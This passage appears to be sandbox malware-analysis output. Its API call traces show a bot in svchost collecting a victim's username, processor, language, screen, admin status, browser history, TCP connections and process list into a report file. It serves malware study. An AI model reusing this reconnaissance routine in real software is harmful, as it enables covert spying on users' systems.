                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60E09230A86315BBF7215B90CD0EF6E7AACAF00B89FA40114FA00FA0C0D7E06B05C6A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96CA1
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96CBF
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02C96CDB
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegQueryValueExA.KERNEL32(?,5DD2BAAFa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C96D02
                                                                                                                                                                                                                • Part of subcall function 02C96C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96D7A
                                                                                                                                                                                                                • Part of subcall function 02C96C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96D81
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96D95
                                                                                                                                                                                                                • Part of subcall function 02C96C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96DAE
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02C96DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,74DF0F10,00000000,02CAA2D3), ref: 02CA4A88
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA4A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA4A98
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA4A9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 789118668-0
                                                                                                                                                                                                              • Opcode ID: 667f668ef363b875d2350915e70736ca7a4ce26a7a4a5140b8ec66f73c6e1333
                                                                                                                                                                                                              • Instruction ID: 580f016d4659280ad127dccb156d2fc9cab60d16282ea0b59ab4ada6afbd4b04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 667f668ef363b875d2350915e70736ca7a4ce26a7a4a5140b8ec66f73c6e1333
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69017B71BC62425ADF385A78693073AAB9EDFC2198B4C0369E847C7284E7B1CC00A354
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CAA4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 02CAA505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(02CAA660,00000008,00000000,02CAA660), ref: 02CAA51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1494777729-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,02CED3A4,75B05CE0), ref: 02C94C37
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 02C94C5E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C94C6F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02C93F9D,00000000), ref: 02C94C7F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02C94C90
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94CA4
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02C94CB1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 02C94CC1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02C94CD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94CE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94CF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94D03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02C94D14
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C94D28
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94D3C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02C94D49
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02C94D59
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02C94D6A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94D9C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94DAB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C94DBF
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C94DD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94DE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94DF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94E03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94E14
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 02C94E25
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02C94E46
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02C94E56
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02C94E67
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94E92
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94EA1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C94EB5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94EC8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94EDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94EE9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94EF9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94F0A
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02C94F21
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94F35
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C94F42
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02C94F52
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C94F63
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94F8E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94F9D
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C94FB1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94FC4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94FD8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94FE5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94FF5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95006
                                                                                                                                                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 02C9500C
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C95026
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95093
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02C950A0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02C950B0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02C950C1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C950EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C950FB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C9510F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95122
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95136
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95143
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C95153
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95164
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02C9516E
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 02C95175
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 02C9517E
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 02C95187
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C9519F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C951B6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C951C3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02C951D3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C951E4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C9520F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C9521E
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C95232
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95245
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95259
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95266
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C95276
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95287
                                                                                                                                                                                                              • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02C952A7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C952BB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02C952C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02C952D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02C952E9
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95314
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95323
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C95337
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C9534A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C9535E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C9536B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C9537B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C9538C
                                                                                                                                                                                                              • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02C953AC
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C953C0
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02C953CD
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02C953DD
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02C953EE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C9541C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C9542B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C9543F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95452
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95466
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95473
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C95483
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95494
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 02C954A1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C95502
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95519
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02C95526
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02C95536
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02C95547
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95572
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95581
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C95595
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C955A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C955BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C955C9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C955D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C955EA
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C955FE
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C9560B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02C9561B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C9562C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C9566C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9567B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9568C
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02C9569F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C956B3
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C956C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C956D0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C956E1
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C956F3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95707
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02C95714
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02C95724
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02C95735
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95760
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C9576F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C95783
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95796
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C957AA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C957B7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C957C7
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C957D8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C957EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02C957F9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02C95809
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02C9581A
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C95820
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C95843
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95875
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C95884
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C95895
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C958A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C958BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C958C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C958D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C958E6
                                                                                                                                                                                                                • Part of subcall function 02C94900: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02C94925
                                                                                                                                                                                                                • Part of subcall function 02C94900: _snprintf.MSVCRT ref: 02C9494D
                                                                                                                                                                                                                • Part of subcall function 02C94900: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,74DF3490), ref: 02C94987
                                                                                                                                                                                                                • Part of subcall function 02C94900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C949A9
                                                                                                                                                                                                                • Part of subcall function 02C94900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C949B5
                                                                                                                                                                                                                • Part of subcall function 02C94900: WriteFile.KERNEL32(00000000,IE history:,0000000C,02C958F1,00000000), ref: 02C949C9
                                                                                                                                                                                                                • Part of subcall function 02C94900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C949D7
                                                                                                                                                                                                                • Part of subcall function 02C94900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C949EB
                                                                                                                                                                                                                • Part of subcall function 02C94900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C949F7
                                                                                                                                                                                                                • Part of subcall function 02C94900: WriteFile.KERNEL32(00000000,02CD5C1C,00000001,00000000,00000000), ref: 02C94A0B
                                                                                                                                                                                                                • Part of subcall function 02C94900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C94A19
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,74DF3490), ref: 02C9419D
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapAlloc.KERNEL32(00000000), ref: 02C941A0
                                                                                                                                                                                                                • Part of subcall function 02C94180: memset.MSVCRT ref: 02C941B4
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C94224
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94232
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapValidate.KERNEL32(00000000), ref: 02C94235
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94242
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapFree.KERNEL32(00000000), ref: 02C94245
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02C9425D
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapAlloc.KERNEL32(00000000), ref: 02C94260
                                                                                                                                                                                                                • Part of subcall function 02C94180: memset.MSVCRT ref: 02C94270
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C9428A
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C94297
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapValidate.KERNEL32(00000000), ref: 02C9429A
                                                                                                                                                                                                                • Part of subcall function 02C94180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C942AB
                                                                                                                                                                                                                • Part of subcall function 02C94180: HeapFree.KERNEL32(00000000), ref: 02C942AE
                                                                                                                                                                                                                • Part of subcall function 02C944D0: memset.MSVCRT ref: 02C94503
                                                                                                                                                                                                                • Part of subcall function 02C944D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9450E
                                                                                                                                                                                                                • Part of subcall function 02C944D0: Process32First.KERNEL32 ref: 02C94531
                                                                                                                                                                                                                • Part of subcall function 02C944D0: GetHandleInformation.KERNEL32(00000000,?), ref: 02C9454D
                                                                                                                                                                                                                • Part of subcall function 02C944D0: CloseHandle.KERNEL32(00000000), ref: 02C94567
                                                                                                                                                                                                                • Part of subcall function 02C94710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,74DF3490,?,?,?,?,02C95903,00000000), ref: 02C9475A
                                                                                                                                                                                                                • Part of subcall function 02C94710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02C95903,00000000,00000000,00000000), ref: 02C947A5
                                                                                                                                                                                                                • Part of subcall function 02C94710: HeapAlloc.KERNEL32(00000000,?,?,?,?,02C95903,00000000,00000000,00000000), ref: 02C947AC
                                                                                                                                                                                                                • Part of subcall function 02C94710: memset.MSVCRT ref: 02C947BF
                                                                                                                                                                                                                • Part of subcall function 02C94710: _snprintf.MSVCRT ref: 02C9480A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C95913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C95924
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
